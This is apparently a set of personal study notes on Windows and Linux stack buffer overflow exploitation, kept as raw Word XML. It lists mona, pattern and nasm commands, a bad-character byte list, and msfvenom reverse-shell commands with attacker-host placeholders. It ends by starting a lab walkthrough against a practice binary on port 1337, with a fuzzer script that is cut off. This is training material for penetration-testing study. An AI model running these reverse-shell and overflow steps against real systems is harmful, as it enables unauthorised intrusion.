          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>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 xml:space="preserve">!mona </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 xml:space="preserve">!mona modules </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!mona find -s "instruction " -m "module to search"</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r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>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24"/>
          <w:szCs w:val="2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24"/>
          <w:szCs w:val="24"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>data format</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load word or store word instruction uses only one memory address. The lowest address of the four bytes is used for the address of a block of four contiguous bytes.</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How is a 32-bit pattern held in the four bytes of memory? There are 32 bits in the four bytes and 32 bits in the pattern, but a choice has to be made about which byte of memory gets what part of the pattern. There are two ways that computers commonly do this:</w:t>
      </w:r>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Big Endian Byte Order:</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The most significant byte (the “big end”) of the data is placed at the byte with the lowest address. The rest of the data is placed in order in the next three bytes in memory.</w:t>
      </w:r>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Little Endian Byte Order:</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The least significant byte (the “little end”) of the data is placed at the byte with the lowest address. The rest of the data is placed in order in the next three bytes in memory.</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In these definitions, the data, a 32-bit pattern, is regarded as a 32-bit unsigned integer. The “most significant” byte is the one for the largest powers of two: 231, …, 224. The “least significant” byte is the one for the smallest powers of two: 27, …, 20.</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For example, say that the 32-bit pattern 0x12345678 is stored at address 0x00400000. The most significant byte is 0x12; the least significant is 0x78.</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Within a byte the order of the bits is the same for all computers (no matter how the bytes themselves are arranged).</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mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="305435" cy="305435"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="6" name="Picture 6" descr="IMG_261"/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture"/>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="shape_0" ID="Picture 6" stroked="f" o:allowincell="f" style="position:absolute;margin-left:0pt;margin-top:-24.05pt;width:23.95pt;height:23.95pt;mso-wrap-style:none;v-text-anchor:middle;mso-position-vertical:top" type="_x0000_t75">
                <v:fill o:detectmouseclick="t" on="false"/>
                <v:stroke color="#3465a4" weight="9360" joinstyle="round" endcap="flat"/>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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4"/>
          <w:szCs w:val="1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4"/>
          <w:szCs w:val="14"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>genrating shellcode</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msfvenom -p windows/shell_reverse_tcp lhost=attackerip lport=attackerport -f fileformat -e x86/shikata_ga_nai -b "badcharcters"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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4"/>
          <w:szCs w:val="1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4"/>
          <w:szCs w:val="14"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>optimising the shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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4"/>
          <w:szCs w:val="1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4"/>
          <w:szCs w:val="14"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>getting reverse shell</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nc -nlvp port to connect</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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4"/>
          <w:szCs w:val="1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4"/>
          <w:szCs w:val="14"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>improving the exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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30"/>
          <w:szCs w:val="30"/>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30"/>
          <w:szCs w:val="30"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>linux buffer overflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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4"/>
          <w:szCs w:val="1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4"/>
          <w:szCs w:val="14"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>discovering the vulnerablity</w:t>
      </w:r>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replicating the crash</w:t>
      </w:r>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introduction to the edb(evans debugger)</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edb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:spacing w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="50"/>
        <w:ind w:left="0" w:right="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Console" w:cs="Lucida Console" w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>ADDING THE APPLCATION TO THE EDB</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r>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controlling the EIP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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4"/>
          <w:szCs w:val="1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4"/>
          <w:szCs w:val="14"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>locating the eip using unique pattern</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msf-pattern_create -l string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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4"/>
          <w:szCs w:val="1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4"/>
          <w:szCs w:val="14"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>locating the offset using the unique pattern</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msf-pattern_offset -q string</w:t>
      </w:r>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locating Space for shell code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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4"/>
          <w:szCs w:val="1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4"/>
          <w:szCs w:val="14"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>geting opcodes</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msf-nasm_shell</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nasm&gt;</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nasmm&gt;</w:t>
      </w:r>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checking for bad charcters</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\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"</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"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"</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"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"</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"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"</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"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"</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"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:pBdr/>
        <w:spacing w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:left="0" w:right="0" w:hanging="0"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="0"/>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"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"</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"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"</w:t>
      </w:r>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finding a return address</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r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>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24"/>
          <w:szCs w:val="2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24"/>
          <w:szCs w:val="24"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>nasm opcodes</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mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="305435" cy="305435"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="7" name="Picture 7" descr="IMG_262"/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture"/>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="shape_0" ID="Picture 7" stroked="f" o:allowincell="f" style="position:absolute;margin-left:0pt;margin-top:-24.05pt;width:23.95pt;height:23.95pt;mso-wrap-style:none;v-text-anchor:middle;mso-position-vertical:top" type="_x0000_t75">
                <v:fill o:detectmouseclick="t" on="false"/>
                <v:stroke color="#3465a4" weight="9360" joinstyle="round" endcap="flat"/>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>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24"/>
          <w:szCs w:val="24"/>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24"/>
          <w:szCs w:val="24"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>data format</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load word or store word instruction uses only one memory address. The lowest address of the four bytes is used for the address of a block of four contiguous bytes.</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How is a 32-bit pattern held in the four bytes of memory? There are 32 bits in the four bytes and 32 bits in the pattern, but a choice has to be made about which byte of memory gets what part of the pattern. There are two ways that computers commonly do this:</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 Big Endian Byte Order: The most significant byte (the “big end”) of the data is placed at the byte with the lowest address. The rest of the data is placed in order in the next three bytes in memory.</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 Little Endian Byte Order: The least significant byte (the “little end”) of the data is placed at the byte with the lowest address. The rest of the data is placed in order in the next three bytes in memory.</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In these definitions, the data, a 32-bit pattern, is regarded as a 32-bit unsigned integer. The “most significant” byte is the one for the largest powers of two: 231, …, 224. The “least significant” byte is the one for the smallest powers of two: 27, …, 20.</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For example, say that the 32-bit pattern 0x12345678 is stored at address 0x00400000. The most significant byte is 0x12; the least significant is 0x78.</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w:rFonts w:eastAsia="Lucida Console" w:cs="Lucida Console" w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Within a byte the order of the bits is the same for all computers (no matter how the bytes themselves are arranged).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:spacing w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:left="0" w:right="0" w:hanging="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="305435" cy="305435"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="8" name="Picture 8" descr="IMG_263"/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture"/>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="shape_0" ID="Picture 8" stroked="f" o:allowincell="f" style="position:absolute;margin-left:0pt;margin-top:-24.05pt;width:23.95pt;height:23.95pt;mso-wrap-style:none;v-text-anchor:middle;mso-position-vertical:top" type="_x0000_t75">
                <v:fill o:detectmouseclick="t" on="false"/>
                <v:stroke color="#3465a4" weight="9360" joinstyle="round" endcap="flat"/>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>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genrating shellcode</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msfvenom -p linux/x86/shell_reverse_tcp lhost=ip of attacker lport=port to connect -b "badcharcters here" -f fileformat -o outputname</w:t>
      </w:r>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modfying shellcode</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msfvenom -p linux/x86/shell_reverse_tcp lhost=ip of attacker lport=port to connect -b "badcharcters here" -f fileformat -v shellcode</w:t>
      </w:r>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r>
        <w:rPr>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getting shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:pBdr/>
        <w:spacing w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:left="0" w:right="0" w:hanging="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">nc -nlvp port </w:t>
      </w:r>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hyperlink r:id="rId7">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>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bufferoverflow exploits</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:spacing w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="200"/>
        <w:ind w:left="0" w:right="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:eastAsia="Lucida Console" w:cs="Lucida Console" w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
            <w:b w:val="false"/>
            <w:i w:val="false"/>
            <w:caps w:val="false"/>
            <w:smallCaps w:val="false"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:spacing w:val="-6"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w14:textFill>
              <w14:solidFill>
                <w14:schemeClr w14:val="tx1"/>
              </w14:solidFill>
            </w14:textFill>
          </w:rPr>
          <w:t>practice applications</w:t>
        </w:r>
      </w:hyperlink>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Normal"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Right-click the Immunity Debugger icon on the Desktop and choose "Run as administrator".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When Immunity loads, click the open file icon, or choose File -&gt; Open. Navigate to the vulnerable-apps folder on the admin user's desktop, and then the "oscp" folder. Select the "oscp" (oscp.exe) binary and click "Open".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The binary will open in a "paused" state, so click the red play icon or choose Debug -&gt; Run. In a terminal window, the oscp.exe binary should be running, and tells us that it is listening on port 1337.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>On your Kali box, connect to port 1337 on MACHINE_IP using netcat:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="00FF00"/>
          <w:shd w:fill="000000" w:val="clear"/>
        </w:rPr>
        <w:t>nc MACHINE_IP 1337</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Type "HELP" and press Enter. Note that there are 10 different OVERFLOW commands numbered 1 - 10. Type "OVERFLOW1 test" and press enter. The response should be "OVERFLOW1 COMPLETE". Terminate the connection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Mona Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The mona script has been preinstalled, however to make it easier to work with, you should configure a working folder using the following command, which you can run in the command input box at the bottom of the Immunity Debugger window:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>!mona config -set workingfolder c:\mona\%p</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Create a file on your Kali box called fuzzer.py with the following contents:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>import socket, time, sys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ip = "MACHINE_IP"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>port = 1337</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>timeout = 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>prefix = "OVERFLOW1 "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
